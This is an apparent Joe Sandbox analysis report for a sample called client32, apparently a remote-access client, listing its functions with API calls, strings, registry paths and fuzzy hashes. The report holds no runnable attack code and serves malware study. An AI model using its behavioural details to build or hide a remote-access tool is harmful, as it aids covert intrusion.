Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_memsetstd::exception::exceptionwsprintf
String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
API String ID: 144328431-1024648535
Opcode ID: ec2df561275c0d64ba6d257a16c8b5c35912085c7d85a207c9b9c2d87efd88b9
Instruction ID: 09a7b7f2a39b786243c3074fc4a04aff0e2c3ee4e0c0e7a142bf3ec4b628a9f7
Opcode Fuzzy Hash: ec2df561275c0d64ba6d257a16c8b5c35912085c7d85a207c9b9c2d87efd88b9
Instruction Fuzzy Hash: F941C075E01315ABDB12CFA98D84BAEFBE4FB88718F54852AE819D3244E731A5008B51

Function 11158220 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,7E4636A2,?,00000000,00000001), ref: 11158267
CoCreateInstance.OLE32(111C06FC,00000000,00000017,111C062C,?), ref: 11158287
wsprintfW.USER32 ref: 111582A7
SysAllocString.OLEAUT32(?), ref: 111582B3
wsprintfW.USER32 ref: 11158367
SysFreeString.OLEAUT32(?), ref: 11158408

Strings

root\CIMV2, xrefs: 111582A1
SELECT * FROM %s, xrefs: 11158361
WQL, xrefs: 11158380

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
String ID: SELECT * FROM %s$WQL$root\CIMV2
API String ID: 3050498177-823534439
Opcode ID: 201d508ae0e233346d067116be793b91e5c0e3a726f34fbff0a0ba0680b7bfee
Instruction ID: 5c9d69ea3c7034288904af0a1b42e56c7497ab7ebaebdabd712d66f14354dd8e
Opcode Fuzzy Hash: 201d508ae0e233346d067116be793b91e5c0e3a726f34fbff0a0ba0680b7bfee
Instruction Fuzzy Hash: 3A517071B00219AFD7A0DB69CC94F9BF7B9FB8A714F1042A9E819D7251D630AE40CF51

Function 11112B00 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 11112B55
CoCreateInstance.OLE32(111BBF3C,00000000,00000001,111BBF4C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104B1EB), ref: 11112B6F
LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11112B94
GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11112BA6
SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11112BB9
FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11112BC5
CoUninitialize.COMBASE(00000000), ref: 11112C61

Strings

SHELL32.DLL, xrefs: 11112B85
SHGetSettings, xrefs: 11112BA0

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
String ID: SHELL32.DLL$SHGetSettings
API String ID: 4195908086-2348320231
Opcode ID: 28dcea0cc7f8a025214f6af9fd2057e380903a455cb1bbc279c23e6119f70c8b
Instruction ID: 68fa62bcea783be6e527966318309be417962e86cfe8c7ca8d2a125abe7bdbbc
Opcode Fuzzy Hash: 28dcea0cc7f8a025214f6af9fd2057e380903a455cb1bbc279c23e6119f70c8b
Instruction Fuzzy Hash: 00515DB5A002169FDB04DFE5C9C4AEFFBB9FF88304F218569E615AB244D730A941CB61

Function 685A2F80 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 685A2FBB
GetTickCount.KERNEL32 ref: 685A300D
InterlockedExchange.KERNEL32(?,00000000), ref: 685A301B
_calloc.LIBCMT ref: 685A303B
_memmove.LIBCMT ref: 685A3049
InterlockedDecrement.KERNEL32(?), ref: 685A307F
SetEvent.KERNEL32(00000308,?,?,?,?,?,?,?,?,?,?,?,?,?,?,97A234B3), ref: 685A308C

Part of subcall function 685A28D0: wsprintfA.USER32 ref: 685A2965

Strings

a3Zh, xrefs: 685A2F87, 685A2FEB, 685A3021, 685A2FEE, 685A3043, 685A305A, 685A3099
a3Zh, xrefs: 685A2FE0, 685A2FE3

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
String ID: a3Zh$a3Zh
API String ID: 3178096747-1469771974
Opcode ID: c3b386c5d1f3d419a61cc250ec1f38c9d0b35944b3ff5a5a76c454e13496c827
Instruction ID: 34c56f1df615941f22e7a00de43ead90c8a12db29b9b1b45dd867d994322e2e9
Opcode Fuzzy Hash: c3b386c5d1f3d419a61cc250ec1f38c9d0b35944b3ff5a5a76c454e13496c827
Instruction Fuzzy Hash: 104137B5D00209AFDB10DFA5D885AEFB7F8FF88304F408516E915E7240E7759A458BA1

Function 685B0D40 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,685B0F2B,89DA8021,00000000,?,?,685CF278,000000FF,?,6859AE0A,?,00000000,?,00000080), ref: 685B0D48
GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 685B0D5B
GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-685DCB4C,?,?,685CF278,000000FF,?,6859AE0A,?,00000000,?,00000080), ref: 685B0D76
_malloc.LIBCMT ref: 685B0D8C

Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE

GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,685CF278,000000FF,?,6859AE0A,?,00000000,?), ref: 685B0D9F
_free.LIBCMT ref: 685B0D84

Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25

_free.LIBCMT ref: 685B0DAF

Strings

IPHLPAPI.DLL, xrefs: 685B0D41
GetAdaptersAddresses, xrefs: 685B0D55

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
String ID: GetAdaptersAddresses$IPHLPAPI.DLL
API String ID: 1360380336-1843585929
Opcode ID: 0793eb672395ac2a3c93fec248c92fd000900b9a54595b2b6bf680a5682af908
Instruction ID: 42ad6cadc272536a2ff2776ff80aeab67ed087ff2e94416cc8d5ca3a43c0c877
Opcode Fuzzy Hash: 0793eb672395ac2a3c93fec248c92fd000900b9a54595b2b6bf680a5682af908
Instruction Fuzzy Hash: 7501D4B5240341AFE6209B709D94F6B77ACAB50B00F50481DF9669B2C0EA71F840C724

Function 11141AB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 111419A0: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11141A10
Part of subcall function 111419A0: RegCloseKey.ADVAPI32(?), ref: 11141A74

_memset.LIBCMT ref: 11141AF5
GetVersionExA.KERNEL32(?), ref: 11141B0E
LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
FreeLibrary.KERNEL32(00000000), ref: 11141B5F
GetSystemDefaultLangID.KERNEL32 ref: 11141B6A

Strings

kernel32.dll, xrefs: 11141B20
GetUserDefaultUILanguage, xrefs: 11141B41

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
String ID: GetUserDefaultUILanguage$kernel32.dll
API String ID: 4251163631-545709139
Opcode ID: f4403c578d20b82e01fbdbd50243d795ec373803681fb6755249e61f6e885c6b
Instruction ID: b52f9434772b6d6e8d8038633bf4c77d33c7f8479cfcef56ad60021fb0ce4fde
Opcode Fuzzy Hash: f4403c578d20b82e01fbdbd50243d795ec373803681fb6755249e61f6e885c6b
Instruction Fuzzy Hash: BE31E331F006268BD7119FB5C984BAEF7B0EB05718FA04575E928C3680E7346985CB92

Function 110151F0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 110152AA
_memset.LIBCMT ref: 110152EE
RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015328

Strings

%012d, xrefs: 110152A4
NSLSP, xrefs: 11015338
PackedCatalogItem, xrefs: 11015312
SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101522B

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue_memsetwsprintf
String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
API String ID: 1333399081-1346142259
Opcode ID: 13c1aca20664a4fc0e133d793f1d669f9232a02ffdca666f732179c289691334
Instruction ID: 40dd4717f0c7ad5754e433c7b85868c8d74bcde588045e86a78ebe46af68b9ce
Opcode Fuzzy Hash: 13c1aca20664a4fc0e133d793f1d669f9232a02ffdca666f732179c289691334
Instruction Fuzzy Hash: 01418F75D022299EEB11DF50CC94BEEF7B4EB45318F0445E8E91AA7281EB34AB44CF51

Function 1100FF90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 1100FFBD
std::_Lockit::_Lockit.LIBCPMT ref: 1100FFE0
std::bad_exception::bad_exception.LIBCMT ref: 11010064
__CxxThrowException@8.LIBCMT ref: 11010072
std::_Lockit::_Lockit.LIBCPMT ref: 11010085
std::locale::facet::_Facet_Register.LIBCPMT ref: 1101009F

Strings

bad cast, xrefs: 1101005C

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: b91949114c5cc0d56ba0394389beafb177cfa03f8955ddf8c17424d389eecb5f
Instruction ID: eb2297de3126562b7a6adfe99aab1db74979c6a8f9cac3cb144437a799ef2362
Opcode Fuzzy Hash: b91949114c5cc0d56ba0394389beafb177cfa03f8955ddf8c17424d389eecb5f
Instruction Fuzzy Hash: B631E635E002658FCB52CF94C880BAEF7B4FB0536CF404269E865AB298DB75AD00CB91

Function 685A6940 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 166COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 685A6950

Part of subcall function 685A7BE0: _memset.LIBCMT ref: 685A7BFF
Part of subcall function 685A7BE0: _strncpy.LIBCMT ref: 685A7C0B

Part of subcall function 6859A4E0: EnterCriticalSection.KERNEL32(685DB898,00000000,?,?,?,6859DA7F,?,00000000), ref: 6859A503
Part of subcall function 6859A4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6859A568
Part of subcall function 6859A4E0: Sleep.KERNEL32(00000000,?,6859DA7F,?,00000000), ref: 6859A581
Part of subcall function 6859A4E0: LeaveCriticalSection.KERNEL32(685DB898,00000000), ref: 6859A5B3

Strings

Channel, xrefs: 685A6ADD
1.2, xrefs: 685A6998
Publish %d pending services, xrefs: 685A6AAF
BlZh, xrefs: 685A6B88
Client, xrefs: 685A6AE2

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
String ID: 1.2$BlZh$Channel$Client$Publish %d pending services
API String ID: 1112461860-429780693
Opcode ID: 4e352527ea774d9df39beab3d12507b1a7a3a11d5491ca3cd601c78d2979097a
Instruction ID: 5d3ed0157c170679b21c14aa78076d12a51ce1c935d438aa56610adfde399586
Opcode Fuzzy Hash: 4e352527ea774d9df39beab3d12507b1a7a3a11d5491ca3cd601c78d2979097a
Instruction Fuzzy Hash: AA51AD35A043498FEF10DB7CD894BAE7BE5AB46308F910129DE6193281EB31ED45CB99

Function 11141240 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

FALSE || !"wrong nsmdir", xrefs: 1114130E
..\ctl32\util.cpp, xrefs: 11141267, 11141309
nsmdir < GP_MAX, xrefs: 1114126C

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
API String ID: 3494822531-1878648853
Opcode ID: 1d2eb1ac8d69a6f74e2d2292f6299ccec90df6a61e137f66e811ad89e50a1c5c
Instruction ID: 9db0ad8c4734361e4183e08fa1cc534476f5972450c8a9aa7511e5a375f2920b
Opcode Fuzzy Hash: 1d2eb1ac8d69a6f74e2d2292f6299ccec90df6a61e137f66e811ad89e50a1c5c
Instruction Fuzzy Hash: 42515975E0422E5BDB12CF248C54BDDF7A4AB05B18F2441E4EC89B7681EB717A84CB92

Function 111042A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11186026,000000FF), ref: 11104373
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111043C2
std::exception::exception.LIBCMT ref: 11104424
__CxxThrowException@8.LIBCMT ref: 11104439

Strings

Advapi32.dll, xrefs: 11104375
Wtsapi32.dll, xrefs: 1110436E

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
